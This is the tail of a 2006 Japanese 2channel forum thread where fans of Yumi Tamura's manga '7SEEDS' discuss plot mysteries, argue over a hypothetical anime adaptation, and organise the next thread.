Xデー前の日本はそんなに資源に困ってたのか

941 :花と名無しさん:2006/12/10(日) 00:19:31 ID:???0
新巻くんに角又くんがなんか言ってなかったっけ

人間は食べるだけ食べて他の生き物には還元しないのはおかしい、って、
それの具現化された姿なんじゃ…

…まあ気持ち悪いというのには同意だけれど。

942 :花と名無しさん:2006/12/10(日) 00:24:00 ID:???0
夏Aの先生達が何の感情も抱いてないのが不思議
いくら実験動物とはいえ幼児から育ててりゃ良心の呵責も感じるだろうに
マウスならともかく一応人間の形をしてるんだし
情が湧いた職員は始末されるとか?

943 :花と名無しさん:2006/12/10(日) 00:53:49 ID:???O
アニメ化は極力原作に忠実+αが一番理想だと思うけど、主張の激しい監督や脚本家に
捕まると悲惨だね。割り切りにくい原作ファンは葛藤が激しくなるからなあ。
しかし海外含め知名度が上がるという利点も捨てがたい。
けど下手に改悪されるなら、しない方がいいのは同意。

944 :花と名無しさん:2006/12/10(日) 00:57:26 ID:???0
原作に忠実ならわざわざアニメにする必要無い
アニメ化は原作レイプになっても構わないと思うくらいの気概が必要だな
よって自分はこの作品のアニメ化はしなくていい派

945 :花と名無しさん:2006/12/10(日) 01:07:25 ID:???O
だね。アニメって基本的に漫画とは全く異なる表現方法だから
漫画に忠実すぎるとかなりつまらない出来になる。
テンポが悪かったり、アニメの動く利点がいかされてなかったり。
絵的にも一般受けしなさそうだし、アニメ化は不要だなー

946 :花と名無しさん:2006/12/10(日) 01:36:33 ID:???0
アニメ化はしてもいいじゃん。損になることひとつもないし。
良ければ儲けモンだし、悪ければ無視すりゃいいだけ。ただでもらえる宝くじみたいなもの。
それにBASARAアニメのデキは確かに酷かったけど、第1話始まったときはかなり感動したものだった。
更紗が、朱理が、動いてる喋ってると。(声の方はすぐ失望に変わったけど)。
アニメ化すれば綺麗なカラー絵が多く見れるだろうから、それだけでもうれしい。

947 :花と名無しさん:2006/12/10(日) 01:38:45 ID:???O
原作を尊重しつつ、うまく生かしてアニメに置き換えられるスタッフなら
いいんだけどな。アクションシーンは少なくとも力入れてくれるだろう。
上記の条件ならドラマやハリウッドよりはいい。

948 :花と名無しさん:2006/12/10(日) 01:47:03 ID:???0
クソな出来だった場合、漫画を知らない多くの人に
こんなつまらない作品かと思われてしまう、そっちの方が嫌

949 :花と名無しさん:2006/12/10(日) 01:52:55 ID:???O
だから企画する人やスタッフ次第だね。どっちにしろ花と嵐の再会の
メドが立つまではあり得ないから安心かと。

950 :花と名無しさん:2006/12/10(日) 02:12:51 ID:???O
I.Gが攻殻並のアヌメに作ってくれたら見るわ

951 :花と名無しさん:2006/12/10(日) 05:32:14 ID:???0
アニメ化してくれてよかったわぁ、なんて作品に出会ったことが無い…

952 :花と名無しさん:2006/12/10(日) 10:26:20 ID:???O
アニメ化で知ることができた作品やイメージが広がった作品は多いけどな。

>>942
もともと大儀のためなら人の間引きも些末なことだと思える人間ばかり集めたんだろう。
考えてみれば、ああいう非人道的なことを少なくとも見過ごせる人間がまともなわけはなかったな。

953 :花と名無しさん:2006/12/10(日) 22:20:42 ID:???0
せんせえ達も薬やってるから精神状態おかしいんです…と言われればナットク

954 :花と名無しさん:2006/12/11(月) 09:12:49 ID:???0
>>951
ですノーとは?

955 :花と名無しさん:2006/12/11(月) 10:15:14 ID:???0
やっぱり、アニメ化には反対
アニメになれば、もっと低年齢の子も見るだろうし、まだ物事を、状況によって分けて考える事ができない子が見るには、教育上悪すぎる。

956 :花と名無しさん:2006/12/11(月) 10:30:16 ID:???O
やるなら深夜になるだろうよ。デスノやバトロワなど、どう見ても教育上いいと
思えないのが映画になったり深夜にやってたりするっしょ。
グロ描写をソフトにする手もある。

957 :花と名無しさん:2006/12/11(月) 13:05:20 ID:Gf+YzUv+O
7SEEDSって計5チーム35人なんだっけ
男女半々の偶数な方が、全員ペアを作って子供を生めるて計算になるのにな
ガイド含めたら40人だけど
お偉いさん方は最終的には何人が生き延びる想定をしたんだろう
やっぱり7人?


958 :花と名無しさん:2006/12/11(月) 14:06:14 ID:???0
1×1なら先細りは見えてるんだから、子作りについては乱交になるのは仕方ないし数を合わせる意味はないだろ。
子作りだけなら女の数が多いほうがいいんだけど、それだとサバイバルが弱くなるから。

959 :花と名無しさん:2006/12/11(月) 16:55:52 ID:???0
以前にも言われてたけど
柳のおっさんが一人でも生き残ればいいと
言ってたのはどういう意味なんだろ

960 :花と名無しさん:2006/12/11(月) 16:57:53 ID:???0
虫に脳まで侵食されておかしくなってた

961 :花と名無しさん:2006/12/11(月) 17:06:46 ID:???0
思わずワロタw

意味ありかと思ったけど深い意味はないのかな

962 :花と名無しさん:2006/12/11(月) 18:07:12 ID:???O
>>951
ハガレンとエマは、割りといい出来じゃなかった?
スタッフがえらく頑張ってたよ。
どっちもラストは「…おいおい!」だったけど、
連載中の作品だし、オリジナルラストのそこら辺は仕方なかったかなー。
まぁ多分7種アニメ化は杞憂に終わるでしょうが…。

963 :花と名無しさん:2006/12/11(月) 20:06:32 ID:???0
乱交するなら源五郎とやりたい

964 :花と名無しさん:2006/12/11(月) 21:27:58 ID:???0
>>963
乱交の意味が判ってないだろw

965 :花と名無しさん:2006/12/11(月) 21:38:18 ID:???0
じゃあ源五郎と角又のダブルで

966 :花と名無しさん:2006/12/11(月) 21:48:36 ID:???0
>>965
乱交の意味が判ってないだろw

967 :花と名無しさん:2006/12/11(月) 23:20:59 ID:???0
ちょっとごめん、アニメ化はしないんだよね?
ロムっててわけわかんなくなってきた

968 :花と名無しさん:2006/12/11(月) 23:48:16 ID:???0
しないしない。
もしも、の話だよ。
だいぶ売れてきたし、最近はなんでもすぐアニメ化するから。

969 :花と名無しさん:2006/12/12(火) 00:01:25 ID:???0
>>968
トン。お騒がせしました

970 :花と名無しさん:2006/12/12(火) 00:25:29 ID:???O
今日田村由美のビデオ、中古ショップで見た。
イラストだったりしゅりとさらさの声優さんかな?とかのインタビューあるみたいだった…
あとたむさんの作画課程とか…
こんなのたむさん出してたんだね〜
持ってる人いる?
買わなかったんだけどちょいと気になる

971 :花と名無しさん:2006/12/12(火) 08:26:38 ID:???0
>>954,>>962
あんまり…「こういう会話でその作品があがるってことは世間的にはいい出来なのかー」という感じ
思うに私はアニメ化という行為そのものが嫌いなのかもしれない

972 :花と名無しさん:2006/12/12(火) 09:32:02 ID:???0
少女漫画、少年漫画に限らなければ原作にヒケを取らない(上かも知れない)のはいくつもあるよ。
近年だとプラネテス、蟲師、アカギ、花田少年史など。(少年漫画だとはじめの一歩も良かったと思う)
少女漫画でもフルーツバスケットやふしぎ遊戯あたりはデキも悪くなく、原作を広めるには貢献したと思う。
7種も良いスタッフ、良い放映枠、十分な放映期間を貰えるならやって欲しい。キャストはCDのままでいいかな。

973 :花と名無しさん:2006/12/12(火) 10:34:40 ID:???O
あー、佐々木望だけは。お気に入りらしいけど、不摂生がたたって叫んだときの声が衰えすぎ。

ところで、もう次スレ立ての時期では?

974 :花と名無しさん:2006/12/12(火) 12:33:22 ID:???0
970は気付いてなさそうだね。
で、そろそろテンプレから、花の父親ネタとか削ってもよくないか?

975 :花と名無しさん:2006/12/12(火) 13:38:06 ID:???0
百舌の正体は?

976 :花と名無しさん:2006/12/12(火) 17:09:33 ID:???0
貴士センセ

977 :花と名無しさん:2006/12/12(火) 17:13:07 ID:???0
くりくり同盟の「くりくり」の基準って何だ?安居が駄目で、涼がおkて。

978 :花と名無しさん:2006/12/12(火) 17:15:10 ID:???0
6 名前:花と名無しさん[sage] 投稿日:2006/10/23(月) 01:12:12 ID:???0
よく話題にのぼるネタ

・7SEEDSの時代はBASARAの世界に繋がっているのでは?
 九州が分断されている、生態系が違いすぎるなど、理由はいろいろありますが
 別物と考えたほうがいいです。
 作者はおそらく、同じものとして描いていないと思われます。

・百舌=死神なの?夏Aの誰か?
 9巻で要先輩が行く気であると判明。名字は百舌戸。          >>975 これどうしようか?
 ただ夏Aの安居が半分白髪になったこともあり、まだ確実ではない。
 涼・茂説もまだあり。(茂は厳しいか?)
 
・花の父親は? 
 貴士先生 と妻・美帆の間の娘と判明。      >>974 ここを削るってことだよな?
 要も共に養育にあたる。                自分もいらんと思う。



立ててこようかと思うけど、他に何かある?>>1-6の中で変えるところとか。
んで、百舌の正体は入れるか入れないか。

979 :花と名無しさん:2006/12/12(火) 17:15:26 ID:???0
>>977


980 :花と名無しさん:2006/12/12(火) 18:54:18 ID:???0
>>977
天然パーマじゃないか、そうかの基準。
涼は基本的には、普通だけれど、たまに天然パーマに見えるときがあるのと(私の主観だけど)、
天然パーマじゃなくて、小瑠璃が涼のことを気にかけてたから、入ってもいいよ、って小瑠璃が言ったんだと思う。



981 :花と名無しさん:2006/12/12(火) 18:55:36 ID:???0

神楽坂美鶴 死亡(自殺) 日本舞踏界のホープ 高校野球マニア


ねえ、この日本舞踏会って、日本舞踊の間違いじゃないのかな。

「ぶとう」じゃなくて、「ぶよう」

982 :花と名無しさん:2006/12/12(火) 21:23:31 ID:???0
>>978
今月号で要が未来に行った事は確定してるからな。
全チームが出揃って要らしき人物は百舌していないし。

983 :花と名無しさん:2006/12/12(火) 21:47:47 ID:???O
コミックス派がいること考えると、
まだ残しておいてもいい気もする。

984 :花と名無しさん:2006/12/12(火) 22:58:06 ID:???0
>>981
いっそ日本武道界のホープで。

985 :花と名無しさん:2006/12/12(火) 22:59:21 ID:???0
>>981 美鶴さんが自殺してしまったことで、冬チームは一人になってしまったんだよね。
でも、解凍に失敗して死んでしまった人たちも作者はちゃんと、名前、顔、職業らしきものを設定しているよね。
今後、Xデー以前を語る時に登場するのかな。

986 :花と名無しさん:2006/12/12(火) 23:50:09 ID:???0
>>984
サバイバルなんだから野球2人にピアニスト崩れなんぞ入れるより
そういうの3、4人投入しとけばよかったのに

987 :花と名無しさん:2006/12/12(火) 23:54:04 ID:???0
・花の父親は?
 貴士先生 と妻・美帆の間の娘と判明。
 要も共に養育にあたる。



これは消しちゃっていいかな?

988 :花と名無しさん:2006/12/13(水) 01:20:48 ID:???0
■田村由美作品21■
http://comic6.2ch.net/test/read.cgi/gcomic/1165939399/

ごめん規制で書き込めなかったけど、立てた。花の父親は消して百舌は残しますた。

989 :花と名無しさん:2006/12/13(水) 11:29:58 ID:???O
乙!

990 :花と名無しさん:2006/12/14(木) 00:53:29 ID:???O
乙です。

関西だけだろうけど、深夜2:30からMBSテレビで、ここによくタイトルが出
てきた海外ドラマのLOSTをやるね。いっぺん見てみよ。

991 :花と名無しさん:2006/12/14(木) 02:35:26 ID:???O
情報d!
今チャンネルかえますたっ

992 :花と名無しさん:2006/12/14(木) 16:48:57 ID:???O
埋めついでに。
美帆はやっぱり、貴士や要がたくさんの人間を死なせてきたのは死ぬまで
知らなかったんだろうね?

993 :花と名無しさん:2006/12/14(木) 16:52:14 ID:???0
>>992
全部知ってたんじゃないだろうか。天国の扉とか言ってるし。

994 :花と名無しさん:2006/12/14(木) 17:09:39 ID:???O
逆に全部知ってたとしたら悟りすぎて、正直神経疑っちゃうな。
花の母親なんだから、知ればもっと苦しみの後が顔に滲んでそう。
汚いことは知る必要はない、と教えてないこともあり得ないかな。

995 :花と名無しさん:2006/12/14(木) 17:40:05 ID:???0
>>994
貴士なんかより、ぜんぜん危ない人だと思ったよ。

996 :花と名無しさん:2006/12/14(木) 18:11:33 ID:???O
全部知ってて貴士が「天国」に行けることを前提に話してるんなら、確かにそうだなw

997 :花と名無しさん:2006/12/14(木) 20:58:08 ID:???0
何となく殺人レースで二人だけで気球で逃げようとした朱理に
対してきっぱりとした態度で断った更紗を思い出した。
花似なら美帆は更紗にも見た目は似ているんだろうけど見た目だけなのかも。

998 :花と名無しさん:2006/12/14(木) 21:33:15 ID:???O
それは美帆なら二人で逃げることを選ぶだろうってこと?

999 :花と名無しさん:2006/12/14(木) 21:46:28 ID:???0
2人で逃げようとした人なら、さすがに命を棄ててシェルターを護ろうとはしないだろうと思う。
とりあえず、色々な意味で覚悟は出来ていたんだろうなとは思う>美帆

1000 :花と名無しさん:2006/12/14(木) 21:48:22 ID:???0
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

237 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)